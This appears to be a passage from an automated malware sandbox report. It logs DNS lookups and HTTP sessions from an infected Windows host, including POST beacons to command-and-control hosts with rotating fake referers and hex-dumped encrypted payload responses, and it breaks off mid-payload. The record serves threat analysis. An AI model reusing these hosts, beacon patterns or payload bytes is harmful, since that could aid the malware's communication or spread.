                                                                                                                                  Oct 17, 2022 22:07:09.148441076 CEST53514418.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:10.788518906 CEST4917753192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:11.111504078 CEST53491778.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.171720028 CEST4972453192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:11.191490889 CEST53497248.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.497402906 CEST6145253192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:12.519588947 CEST53614528.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:16.358562946 CEST6532353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:16.378303051 CEST53653238.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:20.105532885 CEST5148453192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:20.124440908 CEST53514848.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:20.468209982 CEST6344653192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:20.732976913 CEST53634468.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:21.377001047 CEST5675153192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:21.532216072 CEST53567518.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:21.719316959 CEST5503953192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:21.738986015 CEST53550398.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.384155035 CEST6097553192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:22.401000023 CEST53609758.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.429269075 CEST5922053192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:23.451821089 CEST53592208.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.593379974 CEST5506853192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:23.611151934 CEST53550688.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.338704109 CEST5668253192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:24.357665062 CEST53566828.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.766866922 CEST5853253192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:24.788784981 CEST53585328.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.926420927 CEST6265953192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST53626598.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.553950071 CEST5626353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:25.571472883 CEST53562638.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.229567051 CEST6551353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:26.247221947 CEST53655138.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.484612942 CEST5668753192.168.2.58.8.8.8
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Oct 17, 2022 22:06:27.866137028 CEST192.168.2.58.8.8.80xd108Standard query (0)furubujjul.netA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:34.090620995 CEST192.168.2.58.8.8.80xc2e5Standard query (0)pelegisr.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:59.379132032 CEST192.168.2.58.8.8.80x28e5Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:03.213567972 CEST192.168.2.58.8.8.80xa082Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:05.740963936 CEST192.168.2.58.8.8.80x3417Standard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:09.127866030 CEST192.168.2.58.8.8.80xdf87Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:10.788518906 CEST192.168.2.58.8.8.80xcdccStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:11.171720028 CEST192.168.2.58.8.8.80x2801Standard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:12.497402906 CEST192.168.2.58.8.8.80x667aStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:16.358562946 CEST192.168.2.58.8.8.80xd3b7Standard query (0)dldsystem.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.105532885 CEST192.168.2.58.8.8.80x1ffeStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.468209982 CEST192.168.2.58.8.8.80x5b73Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:21.377001047 CEST192.168.2.58.8.8.80x1dfbStandard query (0)dldsystem.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:21.719316959 CEST192.168.2.58.8.8.80xb708Standard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:22.384155035 CEST192.168.2.58.8.8.80xa6a4Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:23.429269075 CEST192.168.2.58.8.8.80x33bcStandard query (0)jamesmillion.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:23.593379974 CEST192.168.2.58.8.8.80x895dStandard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.338704109 CEST192.168.2.58.8.8.80xfed5Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.766866922 CEST192.168.2.58.8.8.80xf405Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.926420927 CEST192.168.2.58.8.8.80x467fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:25.553950071 CEST192.168.2.58.8.8.80xeddStandard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:26.229567051 CEST192.168.2.58.8.8.80x517aStandard query (0)1drv.msA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:26.484612942 CEST192.168.2.58.8.8.80xf7b7Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Oct 17, 2022 22:06:27.890122890 CEST8.8.8.8192.168.2.50xd108No error (0)furubujjul.net104.21.93.30A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:27.890122890 CEST8.8.8.8192.168.2.50xd108No error (0)furubujjul.net172.67.203.213A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:34.107852936 CEST8.8.8.8192.168.2.50xc2e5No error (0)pelegisr.com185.220.204.62A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:59.397810936 CEST8.8.8.8192.168.2.50x28e5No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:59.397810936 CEST8.8.8.8192.168.2.50x28e5No error (0)star-mini.c10r.facebook.com157.240.20.35A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:03.235198021 CEST8.8.8.8192.168.2.50xa082No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:05.758786917 CEST8.8.8.8192.168.2.50x3417No error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:09.148441076 CEST8.8.8.8192.168.2.50xdf87No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:09.148441076 CEST8.8.8.8192.168.2.50xdf87No error (0)star-mini.c10r.facebook.com31.13.92.36A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:11.111504078 CEST8.8.8.8192.168.2.50xcdccNo error (0)avtlsgosecure.com34.91.216.49A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:11.191490889 CEST8.8.8.8192.168.2.50x2801No error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:12.519588947 CEST8.8.8.8192.168.2.50x667aNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:16.378303051 CEST8.8.8.8192.168.2.50xd3b7No error (0)dldsystem.com162.144.15.231A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.124440908 CEST8.8.8.8192.168.2.50x1ffeNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.124440908 CEST8.8.8.8192.168.2.50x1ffeNo error (0)star-mini.c10r.facebook.com31.13.92.36A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.732976913 CEST8.8.8.8192.168.2.50x5b73No error (0)avtlsgosecure.com34.91.216.49A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:21.532216072 CEST8.8.8.8192.168.2.50x1dfbNo error (0)dldsystem.com162.144.15.231A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:21.738986015 CEST8.8.8.8192.168.2.50xb708No error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:22.401000023 CEST8.8.8.8192.168.2.50xa6a4No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:22.401000023 CEST8.8.8.8192.168.2.50xa6a4No error (0)star-mini.c10r.facebook.com157.240.20.35A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:23.451821089 CEST8.8.8.8192.168.2.50x33bcNo error (0)jamesmillion.xyz104.192.2.242A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:23.611151934 CEST8.8.8.8192.168.2.50x895dNo error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.357665062 CEST8.8.8.8192.168.2.50xfed5No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.357665062 CEST8.8.8.8192.168.2.50xfed5No error (0)star-mini.c10r.facebook.com31.13.92.36A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.788784981 CEST8.8.8.8192.168.2.50xf405No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST8.8.8.8192.168.2.50x467fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST8.8.8.8192.168.2.50x467fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST8.8.8.8192.168.2.50x467fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST8.8.8.8192.168.2.50x467fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:25.571472883 CEST8.8.8.8192.168.2.50xeddNo error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:26.247221947 CEST8.8.8.8192.168.2.50x517aNo error (0)1drv.ms13.107.42.12A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:26.503609896 CEST8.8.8.8192.168.2.50xf7b7No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  • pelegisr.com
                                                                                                                                  • www.facebook.com
                                                                                                                                  • api.2ip.ua
                                                                                                                                  • github.com
                                                                                                                                  • dldsystem.com
                                                                                                                                  • hmedenoe.org
                                                                                                                                    • furubujjul.net
                                                                                                                                  • ariymxinp.net
                                                                                                                                  • okrenbrpq.com
                                                                                                                                  • gvuhujihq.net
                                                                                                                                  • pyqxykfbyx.net
                                                                                                                                  • egupm.com
                                                                                                                                  • ypsqcei.com
                                                                                                                                  • 185.174.137.174
                                                                                                                                  • gayxc.net
                                                                                                                                  • jnwjh.org
                                                                                                                                  • kqnukffkf.org
                                                                                                                                  • njomtuqes.net
                                                                                                                                  • bcubynupij.com
                                                                                                                                  • xeebbali.org
                                                                                                                                  • ygjlvm.com
                                                                                                                                  • pdviimuy.net
                                                                                                                                  • aaa.apiaaaeg.com
                                                                                                                                  • xqxsaedljj.com
                                                                                                                                    • avtlsgosecure.com
                                                                                                                                  • rpnkx.org
                                                                                                                                  • clcjalto.org
                                                                                                                                  • grafs.net
                                                                                                                                  • dhlyfpb.net
                                                                                                                                  • gnnnraawcb.org
                                                                                                                                  • mkheots.net
                                                                                                                                  • pakvlb.com
                                                                                                                                  • nyftrqq.org
                                                                                                                                  • avqnngwqw.com
                                                                                                                                  • tkavdryu.org
                                                                                                                                  • ewgonaqm.com
                                                                                                                                  • yuvwvqgqwb.com
                                                                                                                                  • tekxbw.com
                                                                                                                                  • vwbkimlhg.com
                                                                                                                                  • ksedxblf.org
                                                                                                                                  • bvenxtm.net
                                                                                                                                  • wxsohsstcq.net
                                                                                                                                  • yclscqegh.org
                                                                                                                                  • dcxytihxr.com
                                                                                                                                  • btqtaywr.org
                                                                                                                                  • xixace.org
                                                                                                                                  • umtcicl.org
                                                                                                                                  • bfdgvxgb.net
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.549694185.220.204.62443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.549695157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  10192.168.2.549712162.144.15.231443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  11192.168.2.549714157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  12192.168.2.549715157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  13192.168.2.54971831.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  14192.168.2.54971931.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  15192.168.2.549692104.21.93.3080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:06:27.929771900 CEST18OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hmedenoe.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 180
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:28.109186888 CEST20INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7oALrIoAwhuoYZT%2FCbtR4LGHLUyRcnMhyng2odjyW3I1mQ2IExUezOq3VBgGDyEZAJ4IYG8DPAaOnJFnR9%2FqOqtQysIm9wQBNEQdv5MrRQjKadOdoSF%2BAbWG35g9A9Dwsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7a89b2606d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 33 38 33 30 0d 0a 18 00 00 00 1f 3d 52 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 95 5f 47
                                                                                                                                  Data Ascii: 3830=R7f0|gW5p@E74o8s#u!}1k-AQY^.%k*0.%sJ& ADi~/EOw9j3N F}O?nbZ@"y*&PDhkv)*ss;Ieus60Qnv4a)H4Q'{7@5r~s45T9ZXrJ=Y;Sm<L~8++E(&9>TxD`1&H<mH_Hw`65'gBB3&Kf!tG1j9E@-97"~R.}<7G4kLiF1R7*^4& 20qEyf${rrXoGt4}'y]J1]3.{cGOOUCVbKB@n5:C*HyT_G
                                                                                                                                  Oct 17, 2022 22:06:28.399422884 CEST278OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ariymxinp.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 225
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:28.500035048 CEST279INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KUWoAro4NNt%2FHkTq3NXBVoTYzm8%2Fc5LLM3XNqxMxxhWzGlP2mWwGy8%2Fre%2FGYHfNo4qfoNE4QxZycKeKjM1Podnv%2B%2FcIlHo%2FDXoXYR4HUb95MOqJYDxgqIybV2D7LZ2gXIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7ab884306d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:28.512474060 CEST279OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://okrenbrpq.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 348
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:28.626049995 CEST281INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0mKA1qbWJO5wreHynT1UWv99rf%2BjxZXEqsThzPL%2BLBuk37HPrPW9ovFsC7%2BmGyfv0XCZSD8y6VqrA%2BMt1YZ%2Brl2uie88lq3%2BVxy7uGGkCRmA85vMOZ9jXW4fOlPB1BQUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7ac496c06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 37 64 36 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 32 59 3e b0 2b c6 28 d9 87 96 d3 15 5b 05 0f d6 c0 97 ac f7 a5 3b e2 df 53 23 30 54 1f f5 09 16 5b 6c 32 60 d2 dd 6d 61 20 2a 85 19 69 f7 6b db bb b2 07 5a 83 a4 07 0d 99 17 c4 f8 7a 7c e1 66 a2 cc f8 83 61 34 77 70 36 f8 37 33 50 97 23 f5 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 59 b9 c7 75 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e b7 f6 ff 78 f7 4a db c4 0d 13 13 a9 bf e1 92 24 18 4f c5 03 b1 c9 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a d4 96 be 21 51 61 36 3c 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 4b 0e e5 0e 8c eb 7e 71 eb 90 d4 1a b0 d0 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 f0 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 57 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 8d 9b de 8e 82 11 e8 e4 1f ac a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 6c e4 9b 1f d4 4c 6a 91 9c 17 0f f1 2c a8 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 f2 8b 8b e1 72 5b d7 9c c4 c3 e0 2b 9d bf bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 